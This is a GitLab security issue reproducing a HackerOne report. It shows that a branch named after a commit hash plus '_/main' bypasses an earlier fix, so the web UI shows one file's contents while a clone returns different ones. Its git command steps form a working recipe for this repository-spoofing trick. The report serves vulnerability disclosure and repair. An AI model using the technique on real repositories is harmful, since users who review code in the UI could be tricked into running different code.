Skip to content

Manipulate the repository content in the UI (bypass #2031845)

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2173053 by shells3c on 2023-09-20, assigned to GitLab Team:

Report | How To Reproduce

Report

Summary

In order to fix #2031845, Gitlab added another check in prohibited_branch_checks method to prevent any branch name that matches <hex>-/. However, the _ character also works and hasn't been protected yet.

Steps to reproduce
  1. Create a new empty project on Gitlab
  2. Clone the project and create a safe repository for UI display:
mkdir -p ./_/main  
echo "safe" > ./_/main/script.sh  
git add -A  
git commit -m .  
git push origin
  1. Create a malicious branch with the malicious code:
git checkout --orphan "$(git rev-parse HEAD)_/main"  
git rm -rf .  
echo "evil" > script.sh  
git add -A  
git commit -m .  
git push origin
  1. Go to your repository settings and set your default branch to the new branch

Now visit the project from Gitlab and view the content of script.sh, you will see safe, but if you clone it, the file will contain evil.

Output of checks

This bug happens on GitLab.com

Impact

Similar to #1864278 (you can read it here if you can't access the HackerOne report), the repository you see from the UI is different than the repository you clone. You can see the video in the original report to understand it better.

How To Reproduce

Please add reproducibility information to this section: